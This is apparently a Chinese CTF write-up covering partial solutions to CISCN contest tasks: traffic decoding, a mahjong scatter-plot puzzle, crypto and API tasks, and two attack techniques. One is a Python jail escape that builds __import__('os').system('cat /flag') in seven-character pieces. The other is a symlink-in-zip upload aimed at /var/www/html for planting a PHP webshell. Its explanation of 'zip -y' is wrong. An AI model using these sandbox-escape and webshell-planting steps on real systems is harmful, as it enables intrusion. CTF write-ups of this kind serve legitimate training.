CISCN国赛–wp(一部分)
第一次参加国赛,我一个小菜鸡,真的纯纯是坐牢
misc部分
签到卡
按顺序打印出print(open(‘/flag’).read())
被加密的生产流量
用wireshark打开流量包,追踪tcp流
在tcp流第0流里发现base编码
一行行里面的字母拼起来MMYWMX3GNEYWOXZRGAYDA===
这几去base32解码即可得到flag
c1f_fi1g_1000
国粹
这题看的嘎嘎眼花
给了3张图片,有一张图片有两排麻将,另外两张图片也是麻将,不过是分开的,不会做,赛后看了佬们的wp,需要将合起来的图片挨个排号
跟据 题目.png这个图片,从左到右按个编号1-42
a.png 作为x轴,k.png作为y轴
然后那个一条是(0,0)点
附脚本
import matplotlib.pyplot as plt
x_coords = [1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4,
5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7,
7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 10, 10, 12, 12, 12, 12, 13, 13, 13, 13, 13,
13, 13, 13, 13, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14, 14, 14, 14, 15, 15, 15, 15, 15, 15, 15, 16, 16, 16,
16, 16, 16, 16, 16, 17, 17, 17, 17, 17, 17, 17, 17, 18, 18, 18, 18, 18, 19, 19, 19, 19, 19, 19, 19, 19, 19,
19, 19, 19, 19, 19, 19, 19, 19, 20, 20, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 23,
23, 23, 23, 23, 23, 23, 23, 23, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 25, 25, 25, 25, 25, 25, 25, 25, 25,
25, 25, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 27, 28, 28, 28, 28,
28, 28, 28, 28, 28, 28, 28, 28, 28, 29, 29, 29, 29, 29, 31, 31, 31, 31, 31, 31, 32, 32, 32, 32, 32, 32, 32,
32, 32, 32, 32, 32, 32, 32, 32, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 34, 34, 34, 34, 34, 34, 34, 34,
34, 35, 35, 35, 35, 35, 35, 35, 35, 35, 35, 35, 36, 36, 36, 36, 36, 36, 36, 37, 37, 37, 37, 37, 37, 37, 37,
37, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 39, 39, 39]
y_coords = [4, 5, 10, 30, 3, 4, 5, 6, 10, 29, 30, 3, 4, 10, 16, 17, 22, 23, 24, 25, 29, 30, 2, 3, 4, 5, 10, 15, 16, 18,
21, 22, 24, 25, 29, 30, 3, 4, 10, 15, 17, 18, 19, 20, 22, 25, 28, 29, 3, 4, 10, 15, 16, 18, 19, 21, 22, 25,
29, 3, 4, 10, 11, 12, 13, 15, 18, 19, 22, 23, 24, 25, 29, 30, 3, 4, 11, 12, 15, 16, 17, 18, 19, 20, 25, 29,
30, 21, 22, 24, 25, 30, 31, 23, 24, 22, 23, 24, 25, 2, 3, 4, 5, 9, 10, 11, 12, 13, 16, 17, 18, 19, 24, 25,
2, 5, 6, 9, 12, 19, 23, 24, 5, 9, 12, 18, 19, 22, 23, 4, 5, 9, 12, 17, 18, 23, 23, 24, 3, 4, 9, 12, 16, 17,
24, 25, 3, 9, 12, 16, 25, 3, 4, 5, 6, 9, 10, 11, 12, 16, 17, 18, 19, 21, 22, 23, 24, 25, 10, 11, 3, 4, 5, 6,
10, 11, 12, 17, 18, 19, 24, 25, 3, 6, 7, 9, 10, 16, 17, 19, 20, 22, 23, 24, 25, 3, 6, 7, 9, 10, 16, 19, 20,
24, 25, 3, 6, 7, 10, 11, 12, 16, 19, 20, 20, 24, 25, 3, 6, 7, 12, 13, 16, 19, 20, 24, 25, 3, 6, 7, 9, 12,
13, 16, 19, 20, 24, 25, 3, 4, 6, 9, 10, 11, 12, 16, 17, 19, 20, 24, 25, 4, 5, 17, 18, 19, 10, 11, 12, 13,
25, 31, 4, 5, 6, 10, 11, 12, 13, 17, 18, 19, 23, 24, 25, 26, 32, 3, 4, 6, 7, 12, 16, 17, 23, 23, 24, 26, 32,
6, 7, 11, 16, 17, 23, 24, 26, 32, 6, 11, 12, 17, 18, 19, 23, 24, 25, 26, 33, 5, 12, 13, 4, 5, 13, 16, 19, 20,
25, 26, 32, 4, 5, 6, 7, 9, 10, 11, 12, 13, 16, 17, 18, 19, 24, 25, 31, 32, 23, 24, 31]
print(len(x_coords))
print(len(y_coords))
plt.scatter(x_coords, y_coords)
plt.title("Scatter Plot")
plt.xlabel("X-axis")
plt.ylabel("Y-axis")
plt.show()
puzzle
哈哈,无语死,2880张图片要我拼图,等后续更新
pyshell
这是一个python的命令窗口
但是限制了输入长度
以可以通过_+”__”获取一个字符串变量 可以不断拼接绕过7个字符的限制
依次输入’__imp’和 _+‘ort’ 将字符串 拼接成
依次输入以下命令拿到flag
'__imp'
_+'ort'
_+'__('
_+"'os"
_+"')."
_+"sys"
_+"tem"
_+"('c"
_+"at "
_+"/fl"
_+"ag'"
_+")"
eval(_)
密码部分
基于国密SM2算法的密钥密文分发
上传名字,学校拿到 id
上传公钥
然后访问/api/quantum接口获取密文
查看新信息,直接访问/api/search接口 上传 quantumStringServer 的内容即可
可信度量
直接grep搜索一下:
grep -r "flag{" /
末尾得到搜索到的文件结果,直接cat即可得到Flag。
Sign_in_passwd
j2rXjx8yjd=YRZWyTIuwRdbyQdbqR3R9iZmsScutj2iqj3/tidj1jd=D
GHI3KLMNJOPQRSTUb%3DcdefghijklmnopWXYZ%2F12%2B406789VaqrstuvwxyzABCDEF5
URL解码:GHI3KLMNJOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5
第一行放input,第二行url解码后是65位的,看大佬wp说是base64码表解码得到flag
web部分
unzip
这个题目要用到软连接
ln -s /var/www/html b//创建一个软连接文件shell
zip -y 1.zip b//压缩b到1.zip
ln -s /var/www/html shell:创建了一个名为 shell 的符号链接,该链接指向 /var/www/html 目录。符号链接是一种特殊类型的文件,可以提供对另一个文件或目录的引用。
zip -y 1.zip shell/:将 shell 目录及其所有内容压缩成一个名为 1.zip 的 ZIP 文件。-y 选项用于在不提示的情况下覆盖现有的 ZIP 文件。
以上命令是数据,要用Linux系统操作
软连接将通过zip命令将软连接打包为1.zip上传到靶机,靶机自动解压到tmp目录下。
找到linux系统下链接的目录压缩包,将它上传,这个时候后端已经有你创建的目录了,
然后创建一个同名的文件夹压缩包
然后将一句话木马写到php中,这个时候将一句话木马上传
压缩包内容如下